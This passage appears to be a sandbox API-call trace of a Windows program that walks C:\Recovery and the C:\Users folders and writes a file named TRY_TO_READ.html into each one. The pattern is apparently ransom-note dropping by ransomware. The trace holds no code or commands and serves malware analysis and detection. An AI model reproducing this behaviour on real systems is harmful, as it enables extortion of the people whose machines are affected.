	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x5832a8
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.947] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.947] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.947] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0051.947] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.947] GetLastError () returned 0x12
	[0051.947] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0051.947] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588de8 | out: hHeap=0x540000) returned 1
	[0051.947] GetLastError () returned 0x12
	[0051.947] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x56e958
	[0051.947] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\TRY_TO_READ.html" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4
	[0051.947] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56e958 | out: hHeap=0x540000) returned 1
	[0051.947] WriteFile (in: hFile=0x3d4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.948] WriteFile (in: hFile=0x3d4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.948] WriteFile (in: hFile=0x3d4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.948] CloseHandle (hObject=0x3d4) returned 1
	[0051.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5965a0 | out: hHeap=0x540000) returned 1
	[0051.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.948] FindNextFileW (in: hFindFile=0x5750a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9bf1f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.949] GetLastError () returned 0x0
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.949] FindNextFileW (in: hFindFile=0x5750a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9bf1f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e68 | out: hHeap=0x540000) returned 1
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56d040 | out: hHeap=0x540000) returned 1
	[0051.949] FindFirstFileW (in: lpFileName="C:\\\\System Volume Information\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9bf1f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x56d040
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5198 | out: hHeap=0x540000) returned 1
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a51c0 | out: hHeap=0x540000) returned 1
	[0051.949] FindFirstFileW (in: lpFileName="C:\\\\Users\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5750e0
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.949] GetLastError () returned 0x5
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.949] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5198
	[0051.949] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575120
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575120 | out: hHeap=0x540000) returned 1
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5198 | out: hHeap=0x540000) returned 1
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.950] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.950] GetLastError () returned 0x5
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5198
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575120
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575120 | out: hHeap=0x540000) returned 1
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5198 | out: hHeap=0x540000) returned 1
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.950] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.950] GetLastError () returned 0x5
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.950] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5198
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.950] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.951] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.951] GetLastError () returned 0x5
	[0051.951] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.951] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.951] GetLastError () returned 0x5
	[0051.951] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0051.951] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8
	[0051.951] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0051.951] WriteFile (in: hFile=0x3d8, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.952] WriteFile (in: hFile=0x3d8, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.952] WriteFile (in: hFile=0x3d8, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.952] CloseHandle (hObject=0x3d8) returned 1
	[0051.952] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.952] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5965a0 | out: hHeap=0x540000) returned 1
	[0051.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.953] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1
	[0051.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.953] GetLastError () returned 0x0
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5940
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e68
	[0051.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5940 | out: hHeap=0x540000) returned 1
	[0051.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e68 | out: hHeap=0x540000) returned 1
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e68
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.953] GetLastError () returned 0x0
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.953] GetLastError () returned 0x0
	[0051.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b6d8
	[0051.953] CreateFileW (lpFileName="C:\\\\Users\\All Users\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8
	[0051.954] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.954] WriteFile (in: hFile=0x3d8, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.955] WriteFile (in: hFile=0x3d8, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.955] WriteFile (in: hFile=0x3d8, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.955] CloseHandle (hObject=0x3d8) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5965a0 | out: hHeap=0x540000) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.955] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.955] GetLastError () returned 0x0
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575120
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575120 | out: hHeap=0x540000) returned 1
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.955] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1
	[0051.955] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.955] GetLastError () returned 0x0
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e18
	[0051.956] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.956] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e18 | out: hHeap=0x540000) returned 1
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e18
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.956] GetLastError () returned 0x0
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.956] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.956] GetLastError () returned 0x0
	[0051.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b6d8
	[0051.956] CreateFileW (lpFileName="C:\\\\Users\\Default User\\TRY_TO_READ.html" (normalized: "c:\\users\\default user\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8
	[0051.957] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.957] WriteFile (in: hFile=0x3d8, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.957] WriteFile (in: hFile=0x3d8, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.958] WriteFile (in: hFile=0x3d8, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.958] CloseHandle (hObject=0x3d8) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5965a0 | out: hHeap=0x540000) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.958] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.958] GetLastError () returned 0x0
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.958] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1
	[0051.958] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.958] GetLastError () returned 0x0
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583aa0
